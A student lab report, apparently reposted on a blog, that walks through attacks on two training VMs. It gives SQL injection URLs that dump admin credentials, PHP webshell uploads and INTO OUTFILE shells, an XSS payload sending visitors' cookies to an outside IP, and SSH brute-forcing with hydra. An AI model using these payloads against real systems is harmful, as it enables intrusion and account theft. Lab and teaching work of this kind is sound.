2. 程式人生 > >web 攻擊靶機

web 攻擊靶機

阿新 發佈:2018-11-01

中國人民公安大學

Chinese people public security university

 

網路對抗技術

實驗報告

 

實驗五

web攻擊靶機

 

 

 

學生姓名

王磊 

年級

2015 

區隊

 二

指導教師

高見 

 

 

資訊科技與網路安全學院

201810月10

一、sql注入靶機攻擊

首先搭建虛擬機器 用kali掃描下當前網段netdiscover -r 192.168.2.0/24

發現可疑ip地址192.168.2.129

並使用nmap掃描這個ip地址,發現其開放了ftp和http協議

開啟該虛擬機器提供的網頁,發現該網站使用url傳參,可能存在sql注入點

在id=1後加一個引號,網頁報錯 該網站存在sql注入漏洞

 

 

使用order by語句試出網站後臺資料庫表的列數 當order by 5 時網頁報錯 因此該查詢涉及到四列元素

使用聯合查詢 檢視網頁的顯示位,得到顯示位就可以顯示資料庫的名字 photoblog

http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4

 

得到資料庫名字 可以查詢資料庫中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

 一般情況下users表對我們有用

http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

繼續查詢users表中列名,有變數名 id,login,password

檢視users表中的資料:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 

 MD5解密後,得到密碼P4ssw0rd

登入到管理員頁面

嘗試上傳檔案,<?php eval($_POST['a'])?>

發現nophp

改完字尾名發現,可以繞過,並上傳成功

http://192.168.2.129/admin/uploads/123456.pHp

 得到目錄,菜刀連線

2.xss靶機攻擊

nmap 掃描192.168.2.130發現靶機開著80埠和ssh協議

測試

 

 

有視窗彈出,證明存在漏洞

在靶機上留言<script>document.write('<img src="http://172.22.152.33/?'+document.cookie+' "/>')</script>

可以將任意登入使用者的cookie傳送到指定ip 在指定 ip 接受 cookie 後可以偽造成登陸者

 

登入介面:使用密碼和使用者名稱進行登入

獲取到的cookie

使用cookie再次進行登入:發現已經已admin的身份登入進頁面中。

進入管理介面後,發現部落格編輯介面存在sql注入漏洞

 

 

http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4

發現2和3可以顯示出來。

 

 

 

 http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以讀取passwd檔案,但是不能讀取shadow檔案。

我們嘗試能不能建立一個檔案。

在編輯頁面發現錯誤提示中有/var/www/classes 目錄,

 

 

嘗試後發現/var/www/css 目錄可寫。

於是構造語句:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然後開啟

http://192.168.2.130/css/s.php

 

說明s.php檔案成功寫入到/var/www/css 目錄,下面將

<?php system($_GET['c']); ?>

寫入z.php中,構造url為:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

訪問z.php,並使用uname -a獲取系統資訊。可以遠端執行命令。

下面寫入一句話木馬,構造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%[email protected]($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀連結:

下面寫入一句話木馬,構造url:

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%[email protected]($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀連結:

發現機器開了ssh,因此用hydra爆破下:

 ssh登陸

相關推薦

web 攻擊靶機

中國人民公安大學 Chinese people’ public security university   網路對抗技術 實驗報告   實驗五 web攻擊靶機    

web攻擊幾種方法

xss csrf攻擊 開始 logs csrf 淺談 網站 ddos art ddos攻擊 sql註入 xss攻擊 竊取cookie發起攻擊。 csrf攻擊 欺騙用戶訪問設好的網頁,網頁裏請求用戶的網站進行攻擊。 淺談常用的幾種web攻擊方式 從零開始學C

metasploit利用漏洞滲透攻擊靶機

用戶 需要 用戶密碼 進入 按鍵 方便 之前 1-43 gin 1、網絡測試環境構建 首先需要先配置好一個滲透測試用的網絡環境,包括如圖1所示的運行Kali Linux系統的計算機,如圖2所示的老師給的Windows Server 2000系統的計算機。這兩臺計算機處於同一

Web攻擊手段

1. XSS  [ cross site scripting ] 跨站指令碼攻擊 【防】對使用者輸入的資料進行HTML轉義處理;   2. CSRF [cross site request forgery] 跨站請求偽造 【防】將cookie 設定為htt

WEB攻擊手段及防禦第1篇-XSS

  概念 XSS全稱為Cross Site Script,即跨站點指令碼攻擊,XSS攻擊是最為普遍且中招率最多的web攻擊方式,一般攻擊者通過在網頁惡意植入攻擊指令碼來篡改網頁,在使用者瀏覽網頁時就能執行惡意的操作,像html、css、img都有可能被攻擊。

WEB攻擊手段及防禦第3篇-CSRF

  概念 CSRF全稱即Cross Site Request forgery,跨站點請求偽造,攻擊者通過跨站點進行偽造使用者的請求進行合法的非法操作,其攻擊手法是通過竊取使用者cookie或伺服器session獲取使用者身份,在使用者不知情的情況下在攻擊者伺服器

WEB攻擊之XSS攻擊與防護

分享一下我的偶像大神的人工智慧教程!http://blog.csdn.net/jiangjunshow 也歡迎轉載我的文章,轉載請註明出處 https://blog.csdn.net/aabbyyz XSS的背景與介紹 背景 隨著網際網路的發展,網站

Web 攻擊之 XSS 攻擊及防禦策略

XSS 攻擊 介紹 XSS 攻擊,從最初 netscap 推出 javascript 時,就已經察覺到了危險。 我們常常需要面臨跨域的解決方案,其實同源策略是保護我們的網站。糟糕的跨域會帶來危險,雖然我們做了訪問控制,但是網站仍然面臨著嚴峻的 XSS 攻擊考驗。 攻擊定義: Cross-Site

我所知道的web攻擊方式

xss 跨站指令碼攻擊 XSS是一種經常出現在web應用中的電腦保安漏洞,它允許惡意web使用者將程式碼植入到提供給其它使用者使用的頁面中。比如這些程式碼包括HTML程式碼和客戶端指令碼。攻擊者利用XSS漏洞旁路掉訪問控制——例如同源策略(same origin policy

WEB攻擊之CSRF攻擊與防護

原文地址:https://www.daguanren.cc/post/csrf-introduction.html CSRF 背景與介紹 CSRF定義: 跨站請求偽造(英語:Cross-site request forgery),也被稱為 one-click attack 或者 session

WEB攻擊之 CSRF 攻擊及防禦策略

介紹 是一種挾制使用者在當前已登入的Web應用程式上執行非本意的操作的攻擊方法。 釋義: 跨站請求攻擊,簡單地說,是攻擊者通過一些技術手段欺騙使用者的瀏覽器去訪問一個自己曾經認證過的網站並執行一些操作(如發郵件,發訊息,甚至財產操作如轉賬和購買商品)。由於瀏覽器曾經認證過,所以被訪問的網站會認為是真正的使

PHP安全之Web攻擊

一、SQL注入攻擊 表單中輸入的內容直接用於驗證身份的查詢,他就會嘗試輸入某些特殊的SQL字串篡改查詢改變其原來的功能,欺騙系統授予訪問許可權。 系統環境不同,攻擊者可能造成的損害也不同,這主要由應用訪問資料庫的安全許可權決定。如果使用者的帳戶具有管理員或其

如何防範常見的Web攻擊-轉載

轉載自https://www.toutiao.com/a6642147029348778509/?iid=56038047054&app=news_article&group_id=6642147029348778509&timestamp=1546567148 今天,從開發人員的角

利用 ASP.NET 的內建功能抵禦 Web 攻擊(轉自msdn)

摘要: Dino 總結了最常見的 Web 攻擊型別,並介紹了 Web 開發人員可以如何使用 ASP.NET 的內建功能來改進安全性。本頁內容ASP.NET 開發人員應當始終堅持的做法如果您正在閱讀本文,可能就不需要再向您灌輸 Web 應用程式中的安全性愈來愈重要這一事實了。您

常見【十種】WEB攻擊及防禦技術總結

最近參加了一個WEB安全培訓,感覺WEB攻擊跟防禦都是挺有意思的。以下總結比較簡短,僅供觀賞哈。 一、XSS攻擊   【介紹】   xss攻擊是跨站指令碼攻擊,例如在表單中提交含有可執行的javascript的內容文字,如果伺服器端沒有過濾或轉義這些指令碼,而這

利用 ASP.NET 的內建功能抵禦 Web 攻擊

本頁內容ASP.NET 開發人員應當始終堅持的做法如果您正在閱讀本文,可能就不需要再向您灌輸 Web 應用程式中的安全性愈來愈重要這一事實了。您需要的可能是一些有關如何在 ASP.NET 應用程式中實現安全性的實際建議。壞訊息是,沒有任何開發平臺 — 包括 ASP.NET在內

常見的web攻擊方式及預防

1.sql注入。 在使用者的輸入被直接動態拼裝sql語句時,可能使用者的惡意輸入被拼到了sql語句上,而造成了一些惡意操作。比如查詢到一些資料甚至刪除一些資料。一般應對方法是對sql語句進行預處理。 thinkPHP防sql注入:https://www.ka

淺談常用的幾種web攻擊方式以及解決辦法

        身在網際網路的時候,web在給我們帶來便利的同時,有些人也在盯著這些便利,因此出現了攻擊網站的現象。所以我們在開發的時候,要注意這些容易被攻擊的地方,以及做好防禦的措施,下面將介紹一些這些常見的攻擊手段以及解決辦法。        1.SQL注入      

軟體工程師應該關注的web攻擊手段

1.SQL注入------常見的安全性問題。    解決方案:前端頁面需要校驗使用者的輸入資料(限制使用者輸入的型別、範圍、格式、長度),不能只靠後端去校驗使用者資料。一來可以提高後端處理的效率,二來可以提高後端資料的安全。                  後端不要動態sql語句,使用儲存過程查詢語句。

淺談常用的幾種web攻擊方式

一、Dos攻擊(Denial of Service attack)   是一種針對伺服器的能夠讓伺服器呈現靜止狀態的攻擊方式。有時候也加服務停止攻擊或拒絕服務攻擊。其原理就是傳送大量的合法請求到伺服器,伺服器無法分辨這些請求是正常請求還是攻擊請求,所以都會照單全收。海量的請求會造成伺服器停止工作或拒絕服務的